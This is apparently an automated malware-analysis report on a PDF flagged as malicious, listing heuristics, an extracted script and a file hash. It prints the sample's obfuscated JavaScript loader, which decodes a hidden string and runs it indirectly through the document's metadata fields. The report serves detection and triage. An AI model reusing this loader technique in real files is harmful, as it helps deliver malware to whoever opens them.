MALICIOUS
Risk Score: 134
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded and obfuscated JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript is likely designed to execute malicious code, as suggested by the String.fromCharCode usage and the 'Suspicious extracted artifact' finding. The extracted artifact 'javascript_obj0008_000.js' is a strong indicator of malicious intent. The exact payload or execution method is unclear due to obfuscation, but the overall pattern suggests a downloader or exploit delivery mechanism.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  <</Type/Action/S/JavaScript/JS(\nfunction SUMqq\(M1\){var _2u_='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',CK5V='',NV8oOPJx,rpovAE4,Pez1o,ELgN6,uNEk,fu_,ymbKX;for\(var lNGrEhmB=0;lNGrEhmB<M1.length;\){NV8oOPJx=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);rpovAE4=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);Pez1o=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);ELgN6=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);uNEk=\(NV8oOPJx<<2\)+\(rpovAE4>>4\);fu_=\(\(rpovAE4&15\)<<4\)+\(Pez1o>>2\);ymbKX=\(\(P …
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0008_000.js | pdf-javascript-stream | PDF /JS object 8 at offset 0x233 | 5451 bytes |

SHA-256: 7dbe5c83caff610e52f51bccb089105e29c175daf809e9eda82e5b710eb3cf17
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 105 of 130 identifiers look randomly generated (e.g. 'r0tPQV7rGuMjFlo2pz5jrdKqkwdzJ4byY6blujnH'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function SUMqq(M1){var _2u_='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',CK5V='',NV8oOPJx,rpovAE4,Pez1o,ELgN6,uNEk,fu_,ymbKX;for(var lNGrEhmB=0;lNGrEhmB<M1.length;){NV8oOPJx=_2u_.indexOf(M1.charAt(lNGrEhmB++));rpovAE4=_2u_.indexOf(M1.charAt(lNGrEhmB++));Pez1o=_2u_.indexOf(M1.charAt(lNGrEhmB++));ELgN6=_2u_.indexOf(M1.charAt(lNGrEhmB++));uNEk=(NV8oOPJx<<2)+(rpovAE4>>4);fu_=((rpovAE4&15)<<4)+(Pez1o>>2);ymbKX=((Pez1o&3)<<6)+ELgN6;CK5V+=String.fromCharCode(uNEk);if(Pez1o!=64)CK5V+=String.fromCharCode(fu_);if(ELgN6!=64)CK5V+=String.fromCharCode(ymbKX);}
return CK5V;}
function KNccfHSW(reW,qHrcB){var DQ8lrzm='',Qd=0;for(YICT=0;YICT<reW.length;YICT++){DQ8lrzm+=String.fromCharCode(reW.charCodeAt(YICT)-qHrcB.charCodeAt(Qd++));if(Qd>=qHrcB.length)Qd=0;}
return DQ8lrzm;}
u2y=KNccfHSW(SUMqq('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'),this.producer);o_1_f=this.author;zYT=this[o_1_f];zYT(u2y);